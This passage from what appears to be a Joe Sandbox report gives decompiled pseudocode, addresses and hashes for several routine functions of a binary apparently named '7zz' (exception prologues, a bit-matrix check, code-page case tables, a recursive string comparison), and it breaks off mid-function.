                                                                      0x0042d69b
                                                                      0x0042d69f
                                                                      0x0042d6a2
                                                                      0x0042d6a5
                                                                      0x0042d6a7
                                                                      0x0042d6ae
                                                                      0x0042d6b1
                                                                      0x0042d6b4
                                                                      0x0042d6b7
                                                                      0x0042d6bd
                                                                      0x0042d6c3
                                                                      0x0042d6c6
                                                                      0x0042d6c9
                                                                      0x0042d6cc
                                                                      0x0042d6d0
                                                                      0x0042d6d0
                                                                      0x0042d6d0
                                                                      0x0042d6b4
                                                                      0x0042d6dc
                                                                      0x0042d6e1
                                                                      0x0042d6e4
                                                                      0x0042d6fd
                                                                      0x0042d6fe
                                                                      0x0042d6e6
                                                                      0x0042d6ee
                                                                      0x0042d6f1
                                                                      0x0042d6f4
                                                                      0x0042d6f4
                                                                      0x0042d705
                                                                      0x0042d708
                                                                      0x0042d70d
                                                                      0x0042d713
                                                                      0x0042d716
                                                                      0x0042d719
                                                                      0x0042d721
                                                                      0x0042d727
                                                                      0x0042d727
                                                                      0x0042d730
                                                                      0x0042d732
                                                                      0x0042d732
                                                                      0x0042d73a
                                                                      0x0042d740
                                                                      0x0042d743
                                                                      0x0042d743
                                                                      0x0042d743
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0042D5F8
                                                                        • Part of subcall function 00428C94: __EH_prolog.LIBCMT ref: 00428C99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: $c[@
                                                                      • API String ID: 3519838083-1303465990
                                                                      • Opcode ID: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                      • Instruction ID: f7f276ab7b0e8e4aae64a949967b144445a492cbfe2f6d3bc49d51a0f31881ab
                                                                      • Opcode Fuzzy Hash: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                      • Instruction Fuzzy Hash: F9717070E002159BCF14EFA9D4816EEB7B1BF84314F50451FE856B7292CB3CA945CBA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042CD7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0042CD7D(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				E0046B890(E004774BC, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E00404AD0(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x47ab08;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x47a668;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x47a668;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E00415C6D(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E00415C6D(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E00408604(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E00408604(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                                                                      0x0042cd82
                                                                      0x0042cd8f
                                                                      0x0042cd98
                                                                      0x0042cf99
                                                                      0x0042cf99
                                                                      0x0042cda8
                                                                      0x0042cdad
                                                                      0x0042cdb2
                                                                      0x0042cdbf
                                                                      0x0042cdc7
                                                                      0x0042cdca
                                                                      0x0042cdcf
                                                                      0x0042cdd4
                                                                      0x0042cdf2
                                                                      0x0042cdf2
                                                                      0x0042cdf7
                                                                      0x0042ce15
                                                                      0x0042ce1b
                                                                      0x0042ce20
                                                                      0x0042ce25
                                                                      0x0042ce44
                                                                      0x0042ce44
                                                                      0x0042ce4b
                                                                      0x0042ce54
                                                                      0x0042ce5b
                                                                      0x0042ce64
                                                                      0x0042ce65
                                                                      0x0042ce68
                                                                      0x0042ce6b
                                                                      0x0042ce6e
                                                                      0x0042ce71
                                                                      0x0042ce74
                                                                      0x0042ce7b
                                                                      0x0042ce7e
                                                                      0x0042ce81
                                                                      0x0042ce84
                                                                      0x0042ce87
                                                                      0x0042ce8d
                                                                      0x0042ce91
                                                                      0x0042ce94
                                                                      0x0042ce96
                                                                      0x0042ce9c
                                                                      0x0042ce9f
                                                                      0x0042cea5
                                                                      0x0042cea7
                                                                      0x0042cead
                                                                      0x0042ceb2
                                                                      0x0042ceb8
                                                                      0x0042cea7
                                                                      0x0042cec0
                                                                      0x0042cec3
                                                                      0x0042cec5
                                                                      0x0042cecb
                                                                      0x0042ced0
                                                                      0x0042ced6
                                                                      0x0042cec5
                                                                      0x0042cedb
                                                                      0x0042cee1
                                                                      0x0042ce96
                                                                      0x0042cee6
                                                                      0x0042ceeb
                                                                      0x0042ceed
                                                                      0x0042cefb
                                                                      0x0042cf11
                                                                      0x0042cf13
                                                                      0x0042cf14
                                                                      0x0042cf19
                                                                      0x0042cf19
                                                                      0x0042cf1e
                                                                      0x0042cf22
                                                                      0x0042cf27
                                                                      0x0042cf2e
                                                                      0x0042cf33
                                                                      0x0042cf39
                                                                      0x0042cf40
                                                                      0x0042cf40
                                                                      0x0042cf43
                                                                      0x0042cf49
                                                                      0x0042cf4c
                                                                      0x0042cf50
                                                                      0x0042cf55
                                                                      0x0042cf59
                                                                      0x0042cf59
                                                                      0x0042cf5b
                                                                      0x0042cf5e
                                                                      0x0042cf61
                                                                      0x0042cf67
                                                                      0x0042cf6a
                                                                      0x0042cf6a
                                                                      0x0042cf6a
                                                                      0x0042cf6f
                                                                      0x0042cf75
                                                                      0x0042cf79
                                                                      0x0042cf7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042cf80
                                                                      0x0042cf81
                                                                      0x0042cf87
                                                                      0x00000000
                                                                      0x0042cf89
                                                                      0x0042cf89
                                                                      0x0042cf89
                                                                      0x00000000
                                                                      0x0042cf87
                                                                      0x00000000
                                                                      0x0042ce27
                                                                      0x0042ce27
                                                                      0x0042ce3e
                                                                      0x0042ce42
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ce42
                                                                      0x00000000
                                                                      0x0042ce27
                                                                      0x0042cdf9
                                                                      0x0042cdf9
                                                                      0x0042ce0f
                                                                      0x0042ce13
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ce13
                                                                      0x00000000
                                                                      0x0042cdf9
                                                                      0x0042cdd6
                                                                      0x0042cdd6
                                                                      0x0042cdec
                                                                      0x0042cdf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042cdf0
                                                                      0x0042cf8d
                                                                      0x0042cf8d
                                                                      0x0042cf94
                                                                      0x00000000
                                                                      0x0042cf94
                                                                      0x0042cdd4
                                                                      0x0042cf9b
                                                                      0x0042cfa1
                                                                      0x0042cfa9

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: $
                                                                      • API String ID: 3519838083-227171996
                                                                      • Opcode ID: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                      • Instruction ID: 5d0b406c18202b3f46059241855fa713d8f087d48a2dc57dffdc94942331e0a4
                                                                      • Opcode Fuzzy Hash: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                      • Instruction Fuzzy Hash: A871AB71A0021ACFCB20CF99E5C0AEEB7B2FF48318F51456ED416A7291D734AA46CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00471A83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E00471A83(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x496228,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00472375(1,  &_v280, 0x100,  &_v1304,  *0x496228,  *0x496444, 0);
						E00472126( *0x496444, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x496228, 0);
						E00472126( *0x496444, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x496228, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x496240) =  *(_t55 + 0x496240) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x496240) = _t77;
								goto L16;
							}
							 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x496240) =  *(_t43 + 0x496240) & 0x00000000;
						} else {
							 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x496240) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                                                      0x00471aa0
                                                                      0x00471aa6
                                                                      0x00471aad
                                                                      0x00471aad
                                                                      0x00471ab4
                                                                      0x00471ab5
                                                                      0x00471ab9
                                                                      0x00471abc
                                                                      0x00471ac5
                                                                      0x00471afe
                                                                      0x00471b1d
                                                                      0x00471b41
                                                                      0x00471b69
                                                                      0x00471b71
                                                                      0x00471b73
                                                                      0x00471b79
                                                                      0x00471b79
                                                                      0x00471b7f
                                                                      0x00471b9a
                                                                      0x00471bac
                                                                      0x00000000
                                                                      0x00471bac
                                                                      0x00471b9c
                                                                      0x00471ba3
                                                                      0x00471b8f
                                                                      0x00471b8f
                                                                      0x00000000
                                                                      0x00471b8f
                                                                      0x00471b81
                                                                      0x00471b88
                                                                      0x00000000
                                                                      0x00471bb3
                                                                      0x00471bb3
                                                                      0x00471bb5
                                                                      0x00471bb6
                                                                      0x00000000
                                                                      0x00471b79
                                                                      0x00471ac9
                                                                      0x00471acc
                                                                      0x00471acc
                                                                      0x00471acf
                                                                      0x00471ad4
                                                                      0x00471ad8
                                                                      0x00471adf
                                                                      0x00471ae7
                                                                      0x00471af1
                                                                      0x00471af1
                                                                      0x00471af1
                                                                      0x00471af4
                                                                      0x00471af5
                                                                      0x00471af8
                                                                      0x00000000
                                                                      0x00471afd
                                                                      0x00471bbc
                                                                      0x00471bc3
                                                                      0x00471bc6
                                                                      0x00471be4
                                                                      0x00471bf9
                                                                      0x00471beb
                                                                      0x00471beb
                                                                      0x00471bf4
                                                                      0x00000000
                                                                      0x00471bf4
                                                                      0x00471bcd
                                                                      0x00471bcd
                                                                      0x00471bd6
                                                                      0x00471bd9
                                                                      0x00471bd9
                                                                      0x00471bd9
                                                                      0x00471c00
                                                                      0x00471c01
                                                                      0x00471c07

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID: $
                                                                      • API String ID: 1807457897-3032137957
                                                                      • Opcode ID: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
                                                                      • Instruction ID: 5c3e5dd18d5ca2b0f7a6e0339bafee86ed4275ccb2fec3f011e76292e71c390b
                                                                      • Opcode Fuzzy Hash: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
                                                                      • Instruction Fuzzy Hash: 2E4189310042981AEB269768DD49BFB7FECEB06704F1404F7D94DC6272D2798948CBAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041C936 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E0041C936(void* __ecx, void* __edx) {
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t103;

				_t89 = __edx;
				E0046B890(E00475600, _t103);
				_t99 = __edx;
				E004039C0(_t103 - 0x18, __ecx);
				_t2 = _t103 - 4;
				 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2, _t99);
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2,  *((intOrPtr*)(_t103 + 8)));
				_t77 = _t103 - 0x24;
				E004039C0(_t77, _t103 - 0x18);
				E0046B8F4(_t103 - 0x24, 0x481390);
				_t100 = _t98;
				E0046B890(E00475614, _t103);
				_t69 = _t89;
				 *((intOrPtr*)(_t103 - 0x14)) = _t77;
				_t59 =  *((intOrPtr*)(_t69 + 8));
				_t78 = 1;
				if(_t59 > _t78) {
					_push(_t100);
					 *((intOrPtr*)(_t103 - 0x10)) = _t78;
					_t101 = 0;
					do {
						_t17 = _t101 + 4; // 0x4
						_t96 = _t17;
						if(E0040881C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4))) == 0) {
							E00403532(_t103 - 0x20,  *0x48c33c);
							 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							E0041C936(_t103 - 0x20,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t103 - 0x20)));
						}
						 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)(_t103 - 0x10)) + 1;
						_t101 = _t96;
						_t59 =  *((intOrPtr*)(_t103 - 0x10));
					} while (_t59 <  *((intOrPtr*)(_t69 + 8)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t59;
			}














                                                                      0x0041c936
                                                                      0x0041c93b
                                                                      0x0041c945
                                                                      0x0041c94a
                                                                      0x0041c94f
                                                                      0x0041c94f
                                                                      0x0041c958
                                                                      0x0041c961
                                                                      0x0041c96b
                                                                      0x0041c976
                                                                      0x0041c97e
                                                                      0x0041c982
                                                                      0x0041c990
                                                                      0x0041c995
                                                                      0x0041c99b
                                                                      0x0041c9a4
                                                                      0x0041c9a6
                                                                      0x0041c9ab
                                                                      0x0041c9ae
                                                                      0x0041c9b1
                                                                      0x0041c9b3
                                                                      0x0041c9b5
                                                                      0x0041c9b8
                                                                      0x0041c9ba
                                                                      0x0041c9c0
                                                                      0x0041c9c0
                                                                      0x0041c9d9
                                                                      0x0041c9e4
                                                                      0x0041c9ef
                                                                      0x0041ca02
                                                                      0x0041ca08
                                                                      0x0041ca0d
                                                                      0x0041ca14
                                                                      0x0041ca19
                                                                      0x0041ca1a
                                                                      0x0041ca1d
                                                                      0x0041ca1f
                                                                      0x0041ca22
                                                                      0x0041ca28
                                                                      0x0041ca2d
                                                                      0x0041ca35

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0041C93B
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                      • __EH_prolog.LIBCMT ref: 0041C99B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ExceptionRaise
                                                                      • String ID: 59@
                                                                      • API String ID: 2062786585-2780377667
                                                                      • Opcode ID: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
                                                                      • Instruction ID: a6f31d39d81224240f44a0bd5d30bed56bf58cfd7ee645fd7ff7855bc7c346c4
                                                                      • Opcode Fuzzy Hash: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
                                                                      • Instruction Fuzzy Hash: 3F31A531A105059BCB14EF99C8829EEB779FF48314F50402EE906B7292DB38AE42CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041F985 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 74%
                                                                      			E0041F985() {
				void* _t37;
				intOrPtr _t38;
				signed int _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t48;
				signed int _t59;
				intOrPtr _t72;
				void* _t73;

				E0046B890(E00475ABC, _t73);
				 *((short*)(_t73 - 0x1c)) = 0;
				 *((short*)(_t73 - 0x1a)) = 0;
				 *(_t73 - 4) = 0;
				_t37 =  *((intOrPtr*)(_t73 + 0x10)) - 7;
				if(_t37 == 0) {
					_t38 =  *((intOrPtr*)(_t73 + 8));
					__eflags =  *((intOrPtr*)(_t38 + 0x3c));
					if(__eflags != 0) {
						_t59 =  *(_t38 + 0x10);
						_t42 =  *(_t38 + 0x14);
						__eflags = (_t59 & _t42) - 0xffffffff;
						if(__eflags != 0) {
							_push(_t42);
							_push(_t59);
							goto L14;
						}
					}
				} else {
					_t44 = _t37 - 1;
					if(_t44 == 0) {
						_t45 =  *((intOrPtr*)(_t73 + 8));
						__eflags =  *((intOrPtr*)(_t45 + 0x38));
						if(__eflags != 0) {
							_push( *((intOrPtr*)(_t45 + 0x34)));
							_push( *((intOrPtr*)(_t45 + 0x30)));
							L14:
							E0040C1C0(_t73 - 0x1c);
						}
					} else {
						if(_t44 == 0xe) {
							_t72 =  *((intOrPtr*)(_t73 + 8));
							if( *((intOrPtr*)(_t72 + 0x3c)) != 0) {
								 *((char*)(_t73 - 0x5c)) = 0;
								if( *((intOrPtr*)(_t72 + 0x18)) != 0) {
									E0041FABD(_t73 - 0x5c, 0x48c724);
								}
								E0041FABD(_t73 - 0x5c, 0x48c71c);
								_t48 = 0;
								if( *((intOrPtr*)(_t73 - 0x5c)) != 0) {
									do {
										_t48 = _t48 + 1;
